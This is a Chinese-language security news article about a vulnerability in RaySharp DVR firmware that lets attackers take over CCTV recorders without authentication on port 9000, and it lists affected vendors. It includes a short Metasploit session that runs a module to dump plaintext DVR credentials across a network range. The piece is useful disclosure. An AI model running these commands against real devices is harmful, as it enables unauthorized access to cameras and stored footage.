DVR漏洞使黑客輕松控制CCTV攝像機(jī)(MSF已更新模塊)
安全研究人員稱,CCTV眾多視頻錄制設(shè)備正面臨被黑風(fēng)險(xiǎn),黑客可以監(jiān)控、復(fù)制和刪除視頻流。
安全人員補(bǔ)充到,除非系統(tǒng)安裝了合適的固件,否則DVR平臺(tái)固件都能成為攻擊者向這些網(wǎng)絡(luò)視頻設(shè)備進(jìn)行攻擊的切入點(diǎn)。這些易受攻擊的CCTV設(shè)備是總部位于廣東的RaySharp公司生產(chǎn)的。
攻擊上周首先被發(fā)現(xiàn),黑客可以通過(guò)DVR 9000端口發(fā)送命令而無(wú)須任何認(rèn)證,這樣黑客就可直接進(jìn)入到DVR的web控制面板。更悲催的是DVR通常支持UPnP(通用即插即用,可以通過(guò)網(wǎng)絡(luò)驅(qū)動(dòng)設(shè)備),網(wǎng)上就能實(shí)施控制。此外,RaySharp DVR還以明文形式存儲(chǔ)用戶名和密碼。
事實(shí)上,受影響的廠商還包括:Swann, Lorex, URMET, KGuard, Defender, DEAPA/DSP Cop, SVAT, Zmodo, BCS, Bolide, EyeForce, Atlantis, Protectron, Greatek, Soyo, Hi-View, Cosmos, and J2000等等。掃描顯示,全世界150多個(gè)國(guó)家超過(guò)58000視頻設(shè)備可被攻擊。
metasploit下已有了相關(guān)模塊:
$ sudo -s -E
# msfconsole
msf> use auxiliary/scanner/misc/raysharp_dvr_passwords
msf auxiliary(raysharp_dvr_passwords) > set RHOSTS 192.168.0.0/24
msf auxiliary(raysharp_dvr_passwords) > set THREADS 256
msf auxiliary(raysharp_dvr_passwords) > run
[+] 192.168.0.153:9000 (user='admin' pass='1234546') mac=00-23-63-63-63-63 version=V2.1-20110716
附:
RaySharp安聯(lián)銳視,是全球領(lǐng)先的數(shù)字視頻監(jiān)控解決方案提供商,以珠海為總部,營(yíng)銷網(wǎng)絡(luò)覆蓋全球近百個(gè)國(guó)家和地區(qū)。安聯(lián)銳視在中國(guó)先后為北京天安門(mén)廣場(chǎng)、2008年北京奧運(yùn)會(huì)場(chǎng)館、深圳國(guó)際會(huì)展中心、中山市政府和澳門(mén)大學(xué)橫琴校區(qū)等數(shù)百萬(wàn)企事業(yè)單位、商業(yè)機(jī)構(gòu)、公共事業(yè)、政府機(jī)關(guān)和家庭社區(qū)提供數(shù)字監(jiān)控服務(wù)。